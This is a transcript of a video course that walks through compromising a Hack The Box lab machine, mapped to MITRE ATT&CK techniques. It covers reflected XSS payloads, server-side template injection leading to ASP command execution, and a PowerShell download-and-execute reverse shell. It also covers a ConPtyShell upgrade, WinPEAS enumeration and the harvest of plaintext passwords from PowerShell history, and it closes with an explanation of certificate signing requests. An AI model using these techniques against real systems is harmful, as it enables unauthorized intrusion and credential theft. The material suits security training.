All right, so now we're going to talk about MITRE attack. And this is a very good explanation. But really what it is a sort of a knowledge base of attacker tactics, techniques, and the procedures used to compromise victim organizations. It turns out that most attacks follow a prescribed pattern, and you can trace an attacker's entry and really exit from your network by mapping it to a particular attack ID. And so if you scroll down, you'll see we have the various tactics. The tactics are what the attacker is trying to accomplish. So if they're trying to accomplish reconnaissance, they can use these various techniques. See the 10 techniques? And this is how. So the what goes along the top, and the how is underneath each what. So for example, if you want to gain initial access, well, you can do it by a drive-by compromise, or you can exploit a public-facing web application. You can phish. And if you click this little, I guess you could say, vertical hamburger, you'll get, you see it says 3 next to phishing. You'll get the sub techniques and even the technique IDs. And so as you go through this course, you'll notice everything is mapped to MITRE. And I did this because I want you guys to see how, hack the box is not just a fun CTF, right? You can actually use this and we can map our attacks against real world execution techniques. Okay. So for example, if I click, I don't know, let's see, valid accounts, right? It'll take me into the technique. You can see there are several sub techniques in here, but it'll also show me, okay, this is the technique ID. These are the sub techniques. Here's some of the tactics that use valid accounts. So it's not just in initial access. It's also in defense evasion. You might use a valid account for persistence, privilege escalation, and of course, initial access. Here are the platforms that are affected by this. Windows, of course. And then we have the permissions that are required, some ways that you can use these valid accounts and what they do. They bypass these defenses. And you have a nice summary. And then you can scroll down. You can actually get procedure examples of different determined human adversaries and advanced persistent threats that are utilizing this particular technique in the wild right now. So this is really cool. If you scroll down to the bottom, it'll actually show you some mitigations that you can put in place and even some tools for detecting these attacks. Okay, guys, so definitely check out the MITRE attack framework. It is awesome. It is constantly updated, and it is something that you definitely need to know about. I mean, you can see this goes all the way from, initial access, execution, and it's logical, right? Because, so for example, the attacker might start with reconnaissance. They're going to case the joint. Then they're going to develop their resources. Maybe they're going to spin up a VPS. Maybe they're going to compromise a website and they'll use that as a C2. Then they'll, of course, gain initial access into the environment, and they want the victim to execute the malware so they can gain persistence and survive a reboot, because gaining initial access is expensive, especially if it comes through phishing. Once persistence is achieved, they're going to try to escalate privileges to the highest level possible, evade any defenses like antivirus, and then try to use credentials to discover additional points of attack, which includes lateral movement when you pivot to other machines, so on and so forth. Okay, guys, so we will get into this in this course, right? We're just going to jump right into the first section where we're going to deal with reconnaissance. I'll see you guys in a little bit. Peace. All right, so we've done some recon, and now it's time to take into the next step of our attack chain, and that is payload development. We're going to try to test for various vulnerabilities in these form fields. But before we do, let's check out the results from some of the earlier recon activity we completed. So you can see we didn't really find any interesting subdomains using wfuzz. And let's flip over to our Ferox Buster results, and we didn't really get anything interesting here. We got 16 results, but these endpoints is basically what we saw inside of Burp. Do we still have Burp open? Yeah. When we went to the target tab and we looked in here and we saw the sitemap tree. So the next step is active exploitation, right? Let's try to get a foothold on this box. All right, so let's just start with something simple. Put my name in here, my email address, securitypluspro.com, test, and I'll click send. Let's see what happens. All right, so we're redirected to preview.asp, and we see the results are reflected in the response. Now, whenever you have form fields like this, it's always good to test for SQL injection, cross-site scripting, things like that, because if these fields aren't sanitized or the developers didn't take the necessary precautions to prevent an attacker from submitting unexpected input, we could have an environment that is conducive to remote command execution. So let's go back here. Let's play with this a little bit. Let's try putting in a single tick in all of these fields to see if we can induce the web app into barfing up some kind of error message. Okay, so all the ticks came back. No error messages there. I mean, it still may be vulnerable to SQL injection, but let's try some cross-site scripting payloads. So this is actually MITRE ATT&CK technique ID, T1203 execution, exploitation for client execution. Okay, so let's try a simple XSS payload, and we are going to put this in all of the fields. So we'll just close off whatever the current field is. Let's see. I can't really type in this field for some reason. It's not typing the right way. Can I put a payload here? I can, okay. So I'll say image source equals X. So this is just closing off the previous tag. I'm going to say image source equals X. Well, X doesn't exist, right? So I'll say on error, what do I want it to do? Well, I want it to send an alert. I'll comment out anything after it. And in this alert, I'll just type out the domain where the cross-site scripting vulnerability has been discovered. And I'll send this here. And I'll also send it here. I want to send it in the name field too. Not sure if it'll let me. Yes. And I believe this probably needs to be a valid email address, but let me go ahead and put it right here. You got to put it in as many fields as you can, right? Okay, so we'll click send message, see what we get. All right, it's freaking out because it knows that's not a valid email address. All right, so Control Z to go back, send message. Bam, we have just confirmed reflected cross-site scripting. So what does this mean? Okay, this means a couple of things. It means that the web app is receiving data in an HTTP request, and then it is including that data in the response in an unsafe way, right? So as an attacker, you can actually see the results here. Let me show you something, guys. Let me click OK here. I had to click OK 3 times for each of these. Control U, that is for each of the XSS payloads. And I'm going to go down to document.domain. Yeah. So you can see this is our injected cross-site scripting payload. It actually started here with this colon and then this bracket. And it ends right here. So this is all us. And you can see it was just dropped unsanitized into the document source. So now we've effectively altered the code of the application using our malicious payload. Now, one thing I do want to say is that technically when you're testing for cross-site scripting, you shouldn't use the alert box anymore. That's old school. That's like 1990, 2000s. You should be using print instead, because some versions of Chrome, newer versions of Chrome, will actually automatically block the alert pop-up. So I'm just going to go back. Looks like all these fields are cross-site scriptable, which is kind of funny. But I don't need this many pop-ups, right? So I'm just going to see if I can get one. And I'll change this from alert to print. This is the modern approach to XSS. And if this displays the print dialog box, we've confirmed XSS, reflected cross-site scripting. And yes, it just popped up. So, I mean, what this means is, again, as an attacker, we could craft a malicious link with our XSS payload. Of course, our payload wouldn't just display this print pop-up. It would display something else or do something evil, like steal the victim's authenticated cookies on a click, assuming they're logged in, right? Or if they're an admin, we could perhaps take control of the application by stealing sensitive tokens from their browser session. Or we could modify any data the victim can modify, or We could covertly coerce the victim to launch attacks against other users in such a way that it will appear as if all attacks are originating from the victim and not us, the attacker. So cross-site scripting is a big deal, and a lot of people don't realize the impact. They see the alert box and they think, oh, that's not a big deal. Well, hopefully now you know that's not the case. So the thing though we have to think about is, how do we actually use this to our advantage? Because do we have a user interacting with this website? In a real site, yeah, we would. We could, if it was a bug bounty, we could type up a report. If it was a pen test, we would type up a report. But in Hack the Box or the OSCP or something like that, we don't know if we have a user interacting with the site or a script that's acting like a user. So that's one thing. But on the other hand, it's statistically probable that if a web application has input that's vulnerable to XSS, it's also vulnerable to other types of attacks. And so we should try things like server-side template injection, because that might give us code execution. Okay, and we can actually check before we do that. I want to check the burp history. Where are we? Proxy history, yes. I'll go down to the bottom here. Just want to see if I can see our payload. And actually, it should be a post request. So one way, if you want to see it in burp, one thing you could do is you could say, well, you could actually turn on intercept. So I'm going to go back here. I just want to catch it in burp. And plus I want to show you the intercept feature of burp if you haven't seen it already. So we go back to this page, we Alt Tab over to burp, we click intercept is on, Alt Tab, send, burp catches it. Here we go. We can say Control R, Control Shift R to send to repeater, Control Space to send the request. And then we can actually change the result so it shows the response this way. You can see a 302 was found, so we could follow the redirection. And if we rendered it, we actually would get that pop-up. I don't know if it's going to pop up the print dialog box though inside this little browser box here. Probably won't. Yeah, I mean, this is just this renderer doesn't have like a print dialog. But anyway, that's how you do it in burp. So in the next lecture, we are going to test for server-side template injection. And we'll talk about the differences between SSTI and XSS. See you in a little bit. Peace. All right, you guys, so now we're going to look at server-side template injection, also known as SSTI. Now, SSTI is something that is similar to XSS. However, the difference relies in the technology. So XSS, cross-site scripting, is based on JavaScript, but SSTI is where an attacker is able to leverage native template syntax to inject malicious payloads into a template. Okay? Now, the way this works is you have a templating engine, right? And this engine is generating web pages. It's building them. And it's combining static templates. So it's getting this from the static template file here. And this is code. Here's a line of lines of code and then its template file. But this is being combined with user input. Which is data. So we have data and we have code. But if the user input, the data, is directly concatenated into the template, then it is processed as code, not as data. Which means an attacker can inject arbitrary template directives into the web application to manipulate the templating engine and possibly take over the server. Okay, so that's, as you can tell, this is pretty dangerous. So what we're going to do is pop open a browser. Let's open up Chrome. And let's just do a search for like SSTI port swigger. You want to go to the Web Security Academy. This is the best resource for web application hacking tutorials. This used to be, the people who actually are behind this site, well, for one, are the same people who built Burp, and two, the same authors behind the Web Application Hackers Handbook, which is now dated, and all that material has been updated live, meaning it's being maintained in the Web Security Academy. So this is the single resource that you should be going to when it comes to getting the latest details on web application hacking. So what you want to do is you want to learn about server-side template injection, roll down, and we want to look for a polyglot payload. Now polyglot, poly means many, and glot, I'm not sure what that part means, but this payload right here is one we can use to fuzz for this vulnerability. So we can inject a sequence of special characters commonly used in template expressions. And if an exception is raised, then this indicates that the injected template syntax is potentially being interpreted by the server in some way. So let's go ahead and minimize this. I just grabbed the payload there. Alt-Tab, let's flip back over to our browser, Chromium. And I'm going to go ahead and put my information in. Yeah, we said test. Let's put in our polyglot payload. You see what we've got here. All right. So this looks pretty good. Let's see what happens. What? Interesting. 500 internal server error. There is a problem with the resource you were looking for and it cannot be displayed. That's interesting, right? So what we can do is we can keep backing off the characters until we find what's breaking things. It's because there's probably bad syntax in our polyglot payload, meaning our templating engine is interpreting something in our SSTI polyglot as code and not data. That's the issue. When the two are confused, vulnerabilities arise. So let's back off that period, click send. Same problem. All right, let's go back. So this is a manual process, right? It really takes a lot of patience. Let's take off this backslash. Take off that percent. Nope. Let's see, take off one of these braces. What about that brace? Same issue. Double quotes. Nope, that's not breaking it. There's still a character in this payload that's breaking the web application. It's not that single tick. See this percent here? Nope. What about that bracket? All right, so we're getting down to the wire here. One of these characters that are remaining is breaking it. Let's get rid of that percent. Ah, that went through. Interesting. So let's go back and see if we can deterministically reproduce this behavior. Let's put that percent back and see if we get the error message. We do. So now we know what's breaking things. It looks like it is the combination of this angled brace and the percent. So let's see if we can remove these guys here. And we can just filter it down to just those two characters. So that breaks it. And remove the percent. Does it go through? Yes. All right, so we know it's the angle bracket and the percent. So now let's see what kind of payload we can put in here. We know this is a Windows box from Wappalizer and from Nmap. See, Windows Server. And we know it's ASP. So what we probably need to do is we can assume that this is ASP.NET syntax, and we can try to execute arbitrary ASP commands using ASP. So let's look at some ASP tutorials to get some information about this. All right, first I want to show you if I did this, Windows Web Server. Let's say I didn't know it was ASP. You can still see ASP comes up, right? So we could search just from these two characters, and Windows Web Server, we would still identify that we're running an ASP web application. So let's just look at an ASP tutorial. W3 schools, yeah. Let's see here. Let's look at the ASP Classic intro. Just want to get the bare bones on ASP syntax. So, easy learning with a show example. Yeah, this is like a hello world. So this is basic ASP syntax. Let's just try this. If we can get the web application to print my first ASP script, then we know we have code execution, right? Click show example. We should just print out my first ASP script. And I'll put it all on one line just to reduce the complexity of the command. Send message. Okay, that worked. Yes. Okay, so we have code execution. Now we just need to insert a test payload. So now we can go over to Chrome and let's Google for SSTI payloads. SSTI payload. Okay, there's a couple options here. I like hack tricks, so let's check that one out. Let's see, server-side template injection, we know what it is. Let's see if we can find some payloads. All right, so we've got a few here. We noticed ours had the little % in the bracket, so let's try this one here. This looks the closest to what we know works. Control C. So we're trying to see if we can get ASP to evaluate this expression. And I'm guessing this equals, so we do a bracket % and equals. That's probably a shortcut, or I guess a alias for bracket % response.write. So let's see if we can get the value of this printed out, which is 49. Yes, this is obviously bad. You see how what's happening here? User input data is being interpreted as code because it just executed. So what we're going to do to get our shell is we just want to see if we can get a ping back. That's one of the most benign tests we can work, right? We don't want to try complicated reverse shells or anything like that right now. Let's just try to get the victim to ping us, the attacker. Can we get the victim server to ping us? Can we coerce this unexpected behavior? So I'm going to set up TCP dump. And I'll set it up on my ton0 interface, which is the hack the box interface. I'll only look for ICMP packets, and I won't do name resolution. All right, good to go there. So now we're going to move into MITRE ATT&CK technique ID T1059.003 execution Windows command shell. Let's do it, guys. Flip back into our web application. Let's go back here. All right, so we've got this here. Let's modify this to make the victim machine ping us, the attacker. What we'll do is we'll call the create object function. And inside here, instead of printing out this static string, we'll call the wscript shell. And specifically the exec method. And what we can do in here is we can basically present arbitrary commands. So I can say, all right, I want the command shell, that is cmd.exe. I want it to run this particular command, which is ping 4 times to our machine. We can see it's 10, 10, 16, 2. 10, 10, 16, 2. That looks good. Write it to standard out and read all. That looks good. All right, let's send that message and see if we get a ping. Box is hanging and we're getting a ping back. Yes, and you can actually see the response returned to standard out, which in this case is the web application. So guys, we just confirmed we have arbitrary code execution on this box. What we're going to do in the next step is turn this into a full-fledged reverse shell, and we're going to use PowerShell. And then we'll do it with Netcat. It's going to be a lot of fun, guys. I'll see you in the next lecture. Peace. All right, so here we are, guys. I just want to review what we did and how our shell popped. So we have our base64 encoded Nisheng reverse shell. We send this payload into the PowerShell-E argument on the victim server, which tells the target server to run this encoded payload. What that means is the server will try to make a GET request for updates.ps1, which is our renamed Nisheng shell. We'll see the GET request come in here from our web server, and then it'll immediately pass the contents into invoke expression. This is an alias for invoke expression, PowerShell, and execute. When the shell executes, the code will run. We'll get code execution on the victim server, which will then shovel a PowerShell reverse shell back to the attacker, that is us, which we will catch in our netcat listener. Okay? So I just wanted to review that because I know that can be kind of confusing. Let's send our payload through. You can see here the TAC-E parameter to send it encoded. So there's the whole process, right? The GET request comes in, we get 200 response, and now we have our shell. Now, what we need to do is upgrade. And by that, I mean this. If I type something random, I do get an error, but it is being sent to standard error, but it's not color-coded. Also, I can't tab complete commandlets. I don't get commandlet completion. If I say get tab, it doesn't do anything. And there are lots of commandlets that start with get tac. So tab completion doesn't work. We don't get the color coding. It's not a fully interactive Windows reverse shell. So that's why I like conpty shell. Let me show you guys how we can get this working. So let's pivot over to Chrome. And we'll just type conpty shell. Yes, fully interactive reverse shell for Windows. Now, PowerShell is really finicky. If you type a single quote when it should be a double quote, you'll get errors, right? You have to get everything exact. Fortunately, I've played with this script long enough. I've done a lot of testing and I've figured out the right way to get it to work. You can see this project is well maintained. It was updated just a few days ago. And we could read through everything here. You'll see there are a couple of methods for getting this to work. There's method 1, there's method 2, and there's another method 3. What I've discovered is we can actually get it to work if we use a modified version of method 1. So I'll show you how we'll modify it as we go through this setup. So let's just grab the script we need, which is the invoked conpty shell. So I'll click that, and we'll get the raw script code by clicking raw. All right, Control-Shift-C, or actually Control-C, not Control-Shift-C. I'm just so used to saying that. Control-AC, you can see we've got nothing here. Control-Shift-V to paste in our GitHub URL. And then we can do sudo wget enter. All right, so now we have it saved. And this happens to be the same folder that is the web root for our Python web server. You can see here it is serving pages out of the same folder that contains our conpty shell, which is important. Now, on the victim machine, oops, I just pressed something and I somehow got out of my shell. If this ever happens to you, see it says tmux is suspended. I can just type tmux attach, or actually I can type tmux ls to list all the shells. You can see we have our tmux session here. Then I can do tmux attach to get back into what I accidentally exited. That's one of the beautiful things of tmux. You can easily resume a closed session. Even if I close the terminal window, I could get back to it that way. All right. So let's go to the instructions and see how we get this to work. All right, so let's try method 1. So we need to set the rows and columns. This does it automatically for us. That's so that we get the correct dimensions of our terminal window and the formatting works out right. So I'll just copy this. You can see we're basically opening a netcat listener on port 3001, server side meaning the attacker side. And we are essentially sending in the results of our terminal size dimension into netcat, so that when we catch the reverse shell, the formatting and the dimension sizes are correct. I know that was a lot of words there, but hopefully that made sense. So I'm going to paste this in. Good, now we're listening on port 3001. Now what we need to do is on the client side. Now this is on the victim. We need to run this, but we need to modify it a little bit, okay? So let's go ahead and copy this. And make sure both windows are full size. Notice I'm completely zoomed in. I'm not running it out of a small, Tmux pane. I'm Control AZ zoomed in because we want the dimensions to match between the victim and the attacker. So Control Shift V. Let's modify a few things here. Take out this piece. Take out this semicolon. And we want to change the address because it's not hosted on GitHub. Now we've downloaded it to our attacker machine, which in the taskbar is telling me it is 10.10.16.2. There we go. Let's run that. And we get an error message. Let's see, why did we get an error message? Unable to connect to the remote server. Okay. It's as if we're not hosting it there. Let's see. Do we have it? We do. Invoke conpty shell. Oh, I see the problem. Wow, that is subtle because we are using HTTPS. It should have been HTTP. Very, very subtle. See how things have to be perfect in order for this to work. Slightest typo will break everything. So let's see. Looks like we did get the GET request for our shell. So now this should be running in memory on the target. Let's wait till we get our shell back. Hopefully we get our shell back. It did download. It's in memory. Shouldn't take this long. Weird. Since it's in memory, the next thing we want to do is run this command, but we can't do that until we get our shell back. And I can't press Control C because then I'll kill the shell. So I think we just need to wait, but it shouldn't take this long. We didn't get an error message though, so it's probably working. I think we just need to wait. All right, so I waited a while and nothing happened. So I'm going to Control C and do this again. This time I'll run it out of a different directory. I don't know, maybe there's some issue with the current directory I'm trying to get the shell to work in. So I'll go into CD, let's see, Windows temp. That's usually a folder that is world writable. And then let's run this command again. That is the correct one. GET request went through. All right, so let's just change this up a little bit, okay? It's not supposed to do that. But hey, this is the stuff that happens, right? When you're trying to get your shells to work, things like this happen all the time. So I'm actually glad that it's not working correctly, so you can see that this process is not perfect. Okay, instead of running it that way, Control AZ, what I'll do is I'll say IEX new object net.web client download string. I'll just download it the traditional way. Because before I was using IWR, which is the invoke web request, and maybe there's some issue with that. Invoke conpty shell.ps1. Okay, I believe that is correct. Good, now we got everything back. All right, so now it's loaded in memory. That appeared to work. If we flip back over to what we need to do here, you can see after we load it into memory, you can see it's all loaded into memory because it's all wrapped in IEX, right? This invoke web request. The next step is just to call the function that is now in memory. So we can call invoke conpty shell. and we will change this to our IP, 16.2. We are listening on 3001. Press enter, and you can see the shell dropped in right here. So that did work. All right, great. So let's press enter a couple times. Let's see if we can do clear. We can. Okay, so now we can do git tab, and you can see things tab complete like you would expect. And if I type something that doesn't make sense, we get the standard error written in red to the screen. So it's a lot more enjoyable to use a shell this way. And we have all the commands, of course, in the history. Everything is nicely formatted. All right, guys. So that is how we do our shell upgrade. You may say it's not worth it. It's too much work. Trust me, it's something you should do, because when you get a shell on a Windows target, especially, you'll run into lots of weird issues with just formatting and characters disappearing and up-down arrows not working right. And it just creates such a headache and a hurdle you have to work around, where if you just take the extra time to properly upgrade your shell using something like conpty shell, it solves those problems. So you saw we did encounter some issues, but you saw how we worked through it. The documentation wasn't exactly correct, but using troubleshooting skills that I've taught you in this lecture, you now know how to work around that. All right. So what we'll do in the next lecture is I'll just show you how we can pop a shell using netcat. So that's another option, right? And this is just another way that we can get a shell on the box. I'll see you guys in a little bit. Peace. All right, so now you can see we have a toehold on the box, but it says we're running as system, which is kind of strange because the web server service is running at the highest privilege level, 1, and 2, this is an insane box. If we popped it with a simple server-side template injection exploit, then this wouldn't be insane, right? There's got to be a lot more to this system than what we're seeing. So what we're going to do is run peas-ng. It used to be called WinPeas, but it has been renamed to peas-ng, and it is a complete suite for privilege escalation. All right, so we'll say the privilege escalation awesome suite new, the new version of it. This is the privilege escalation awesome scripts suite. And we're going to grab this. So what we want actually is WinPeas, because we're up against a Windows target. Now I want to show you what it does find. So we can scroll down here. I used to show you all the cool stuff that it finds. Anyway, we'll see that when we run it. Okay, so I'm going to click WinPeas. And then we will grab the WinPeas executable. You can see it should be in WinPeas right here. And I don't see it. Okay, so the easy way to find this, okay, we could go this way. We could download the CS proj file and compile it in Visual Studio. The easiest way to get this working is just to grab the latest release. So we'll go to releases, and we'll just grab the latest version for any version of Windows, 64-bit or 32-bit. So I'm going to right click, copy link address, minimize, and then what I will do is I will spawn a new pane, and I'll say sudo wget, and I'll just drop this in here to download it. Let's make sure we actually have it. We do. It's the PE executable for Windows, as you can see here. All right, very good. So now we just need to download it from the victim. So I can say invoke web request, but that won't work because we're not in a PowerShell prompt. So first, let's go ahead and avoid a potential error and load the PowerShell process, PowerShell. Now we're in a PowerShell prompt. So we can run invoke web request like this, or we could just do it with IWR, which is an alias. For the URI, we will put in 10.10.16.2 winpeas.any.exe, and we will write it out to c:\Windows temp as winpeas.any.exe and we will use basic parsing. You have to put that on, otherwise you'll get error messages. All right, let's see. Get request comes in. We get a 404 immediately. And I probably typoed something. File not found. Sure. It is very easy to typo. And trust me, my fingers are not fat. Although they sometimes feel that way. All right, so let's see what's going on here. Yes. So we did do a typo. This E should not be there. So I'll just do peas, ne.xe. That's why sometimes it's better just to copy and paste. All right, copy pasta works out well sometimes. Can save you lots of frustration. One piece any, use basic parsing. All right, we're not getting an error message this time. Let's check to see if it's in this current folder. It is. All right, so we've got it here. And now all we need to do is run it. When peas ne.xe, make the screen big, and we will let the script work. When it's done, we'll come back and review the output. See you guys in a little bit. Okay, that finished extremely quick. So I'm going to do Control A, left bracket, and then page up a bunch of times to go to the top, see what we can find in here. It looks like there's a lot of good stuff. And this script is constantly being improved. It's a well-maintained project, so there's always new goodness to find. Sometimes there's too much goodness to find, like what I'm seeing here. All right. Usually when I'm going through the script, I'm paying extra close attention to anything that's in red, and that's a quick way to jump through the script. So we get some information here. We see that it is a host name, web server 01. So that is not the host name we saw earlier in our recon, which was Earth. So we're probably in some kind of container, is my guess. You can see we're running Windows Server 2019 Data Center Edition. And the keyboard language is the United States, but the time zone is Amsterdam, which is kind of weird. We have a few patches applied. Although Watson is showing we have several CVEs that we can exploit. So it's saying it's vulnerable to all these CVEs, and this may be something to investigate later. The fact that there's so many vulnerabilities, though, makes me think this might be a false positive. 12 potential vulnerabilities. We could try to go through these, but let's just continue to go through the output. The computer name is web server 01. We saw that earlier. We have environment variables, right? Let's see here. Anything interesting? Credential guard is not enabled. LSA protection is not enabled. And if you want details on what this stuff does, you can actually just read this little blurb here, or you can click onto the link and it will give you more information about each of these findings. So it's a really, really cool tool. Now we got the PowerShell history file. I really like this because this really is, it's kind of like the bash history for Windows. I'm going to copy this. All the commands are logged in the PowerShell session to console host _ history. So sometimes you can pull clear text credentials from here. You can see exactly, how the admin was working on a box. It's a lot of good juice in there. So that's why I copied it to the clipboard, because it's something I want to check out. Okay, it looks like we have all access to the C drive. So that's good to know. And let's see if there's anything else in here. NTLM signing is set to false. Outbound restrictions are not defined. Okay, let's see, named pipes. This is something you can use if you're looking for evidence of Cobalt Strike on a system, by the way, because Cobalt Strike sets up a bevy of named pipes. And it's one of the ways you can find it. Pro tip there for my blue teamers out there. All right, sysmon is not configured. That's pretty cool. It shows you that it is not installed, so we know there's a detection gap there. Interesting events. Okay, we see container administrator giving even more credence to the fact that this is probably a Windows container. Maybe it's Docker, maybe it's Hyper-V, but we're definitely in some kind of container. We have script block logs. It's PowerShell logs here. We do have a password here in plain text. Password 123bang, so that's really cool. We have a domain here. So that password actually is MITRE ATT&CK technique ID T1552 credential access unsecured credentials, right? Because these credentials aren't secured. I was able to read them in plain text. All right, what else do we have here? Let's go down. This actually looks like the output from the PS console host file. It probably is. I bet it is. Okay, users. All right, we got some accounts here. IIS admin. Yep, we knew about him because this is an IIS web server. And anything else interesting? Here's the user accounts. Administrator is enabled. Got some home folders found. Auto login credentials were used for administrator, but we don't get the credentials here. Let's see. Process information. So it's saying we can actually pwn this process because we are able to write to a folder where we can drop a DIL and then get this executable to load that DIL and potentially get us back a reverse shell running as a system. So that might be another execution path. And this is, looks like, I think this is the container service. So that's a major fail there, allowing us to write to system32. I mean, after all, if we're in the system security context, I mean, it makes sense that we can write to system32. And you can see our netcat process here as well. We can run a DLL hijacking attack against netcat. We can actually see the command line too. So we can see what we ran. We are all up in the logs, guys. So this was not an IppSec safe attack, as you can see. Our PowerShell encoded payload, here it is. It's all in the logs. Which logs are these, by the way? It doesn't really say, but it is cool that this is being logged and we can see it all. All right, so more of our evil right here. That's our reverse shell. Okay, we know about all that. Modifiable services, PSExec. What the heck is PSExec doing on this box? That is not a native binary, so that's kind of interesting. Maybe this box was popped before and the attacker left behind his tools. Okay, so all these services are modifiable. Maybe we can, stop the service, replace the image with a malicious binary, start it, and then get a shell back that way as a higher privileged user. Again, we are running a system, but we're probably system inside the container, not the host. So that's where we're trying to escalate our privileges. Seeing tons of red here. Saying we can modify the registry keys in all of these hives. All right, DLL hijacking. All this stuff is auto run. So it looks like there's a lot of paths and vectors for escalation here. I think we just need to pick one and go with it. Network connections, you can see our connection, PowerShell, is everywhere. Firewall rules. Let's see, what else? Got some red here. Maybe a potential path of escalation with appcmd. It even scrapes the browser history for credentials, for clear text credentials, Chrome, Firefox. So whenever you guys save your credentials in Firefox, PsNG is able to pull them out. It even pulls out the database if it can find it. Very dangerous tool. Checks Opera, Brave. Yep, if you're using Brave, you're not immune. It even checks for Brave. Very cool. IE tab, so it can even show you what tabs are open in IE. Of course, saying we have access to SAM and system, these registry hives. Now let's see, user certificates. We already knew about this host name. Okay, found a document, copying.doc. We don't really need that because it's in the chocolatey repo, which is a benign repo. It's nothing to do with the victim. It's kind of like apt for Windows. Okay, let's see. Lots of red here. And we're done. All right, so what I want to do is look at that con host. Okay, so I'm going to say type, Control-Shift-V. Not what I wanted. Wait. it's running it immediately. Okay. Oh, I see, because of the line break here. So let's create this in a text editor. I'll say type. And this line break here is breaking things. No pun intended there. So copy that out. And type is just a way to show the output. It's kind of like cat in Linux where I can read a file, show the contents, right? Control-Shift-V. And what happened? Cannot find path. Interesting. Okay. Well, they got it from somewhere. It says it does not exist. Let's see if we can manually go there. cd config, cd system profile, cd app data, roaming, cd Microsoft, Windows, PowerShell, cd Microsoft. Maybe we're in the wrong app data roaming folder. Let's try to get the one that's not in the Windows System 32 folder. So we'll say, let's see. Let's go into the container administrator. Container administrator. And we'll do cd app data roaming, Microsoft, Windows, PowerShell. Okay, good. That did get us there. And I see PS read line. And we have console history, and it is a beast. Okay, so, wow. Let's see what's in here. I'm excited. Console host history.txt. Okay, that was a lot that just scrolled by. Wow, look at all these commands that the victim typed. You can actually see them setting up the web server, installing the Windows features, establishing the different sites, setting the web root. Wow, this is pretty cool. Setting the SSL bindings. You can see there's an account. Oh, that's the administrator password. Partner 0706. All right, partner 0706. Very cool. So we've got that password in clear text. Again, this is MITRE ATT&CK T1552 credential access unsecured credentials. These credentials are completely unsecured because they are inside of this folder. You can see they're downloading the code, setting up the guest book, setting up the chat application. You can see them copying the stuff into the right folders, unzipping files, setting up the permissions and groups, setting up server-side includes. I mean, we can see the entire process that was used to build this server. This is a gold mine of information, guys. A gold mine, as you can imagine. Wow, we got some IPs that we could pivot to if we need to. We see them using cert util to pull down ch64.exe. Not sure what that is yet, but we're using 7-zip and auto runs. And let's see, invoke web request. So we're pulling that down. Payload. That looks like an exploit. Maybe it is, maybe it isn't. I don't know. All right, so we've got WinCorp. All right, so we've got the whole setup process here. Now we can see some SOX proxies were being used. Oh, this might be Chisel, because I recognize this syntax, and we'll get into Chisel a little bit later, I think, because it looks like they're using a SOX proxy to pivot to an internal host. And I recognize that because of SOX and this R: format, and then this client. And the more you work with these tools, the more apparent it'll become, and it'll become obvious to you what's happening. I've just worked with these tools for so long, I can immediately point out what looks like, certain behaviors. But I can definitely see it looks like there's some kind of pivoting and reverse tunnels going on here. It's like the user of this web application had to use some sort of tunneling in order to set up a host. So I think that's what we'll do. Power proxy, right? We'll probably use a proxy to go even deeper. Very cool. So that was definitely worth it. What we'll do in the next lecture is we will go to, let's see. Yeah, so in the next lecture, we will explore, okay? We will look at what else we can find on the system and see if we can take our next approach. We already got some clear text credentials from the conhost file, but let's see if there's anything else we need to look at before we move forward. Okay, I'll see you guys in the next lecture when we get into discovery. Peace. All right, so let's talk about certificate signing requests. What are these mysterious CSRs? Now, you might have some idea what they are. You probably heard about them. Maybe you haven't heard about them. That's okay. In this lecture, you are going to understand what they are, because you may remember from the last lecture, we discovered this CSR on the desktop in our victim machine. It's a certificate signing request. So let's talk about this, right? So when a web server, this is a web server, when a web server or device presents its public key as a digital certificate. And it does this so that requesting client browsers, here's a requesting client, it's a laptop here, and their browser's making a request for a website hosted on this web server that has this particular digital certificate. And when this client is requesting a secure connection with the server, this web server here has to first issue a certificate signing request with a certificate authority. That has to be done before this whole process can happen. So this is all based on public key infrastructure, right? In public key infrastructure, we have two keys. Specifically, we have the private key. That's private. And then, of course, we have that public key. Public key. Anybody has access to this public key. Everybody can get to it. That is what we want. But nobody can get access to the private key except the device that generated it. And these two keys are mathematically related. They are inextricably connected through a mathematical formula, such that if the private key encrypts, then the public key decrypts. Or if the public key encrypts, then the private key decrypts. So the server would keep the private key. It might be called like private.key. And it keeps it protected. It doesn't share that with anyone. But it submits a certificate signing request to a certificate authority so that the certificate authority can digitally sign the certificate signing request and issue a digital certificate to the server so it can present that certificate to requesting clients. So let me see if I can break this down a little bit. Right, so when you connect to a system that's listening on port 443 for TLS, it's accepting HTTPS connections, right? It's the HTTPS service is listening. After the DNS lookup occurs, translating the domain name, let's call it securitypluspro.com, right? So after the DNS lookup occurs, the DNS query is sent, the answer is returned, and ultimately, at some point, the client will make a three-way handshake. You can look at my Noob to Ninja course for networking basics exactly on how that works, but it's basically a SYN, ACK, and then a ACK, right? Then what's going to happen is the client is going to send a client hello And in this hello, it's presenting all the ciphers that it understands and supports. And then the server responds with a server hello, and it shows everything it accepts. The two devices then agree on what ciphers to use, and the client looks at the digital certificate issued by the server. And if the client trusts the digital certificate issued by that server, meaning that the server's digital certificate is digitally signed or issued by a certificate authority that the client trusts. And by trusts, again, I mean that it is stored in the trusted root store on this box in the browser. And the validity date is valid, meaning the certificate is not expired or revoked. Then this machine will extract the public key from that cert. The client will extract the public key from that cert so that then it can create a random password called a session key, and then it can encrypt that session key with the server's public key. Okay? And then when it sends some data, which is encrypted with the server's public key, to the server, right? It sends this data to the server. The server is going to get it. And then it can decrypt the session key using its own private key that only it has. And then both the client and the server can use the same session key to encrypt future packets. This provides confidentiality and all that good stuff. So that's how certificate sign-in request works. That's the entire process. And so what we should do at this point is we need to grab that CSR, because there may be some information like a host name or something in there that we can use to expand influence on the network. So let's flip back in here. Going to right click, copy selection. All right, so let's go ahead and create a file. We'll call it rec.txt, Cali, set paste, I, Control-Shift-V. We have the CSR, paste it in. Very good. Certificate request. So now we can use OpenSSL to understand this request. So if we run OpenSSL, nothing happens. Well, it does. We get a prompt, but that's kind of confusing. We could run help. And in here, we see there's a couple things we can do. And something that looks of interest to us is the rec standard command. So that's what we should try. We can run rec help. And let's see, rec tac help. And now we have just the help for the request or the rec. You can see here we can input a file. That would be our rec.txt, right? So if we say tac in rec.txt, we got an error message here. We probably need to get out of this interactive prompt. So I'll say open SSL rec tac in rec.txt. And let's spell this correctly. All right, so we got what we already knew before, nothing new. So let's see, there probably is a way to print this out in plain text. Let's do help or tac help. Help. Okay, so it was open SSL rec. Let's see. Tac help. So we knew about the N for input file. And is there something else that can let us see the plain text? Here we go. Text form of request. How about that? So we'll say rec tac in rec.txt, and then we'll just say text. Ah, yes. So in here, we found another subdomain. 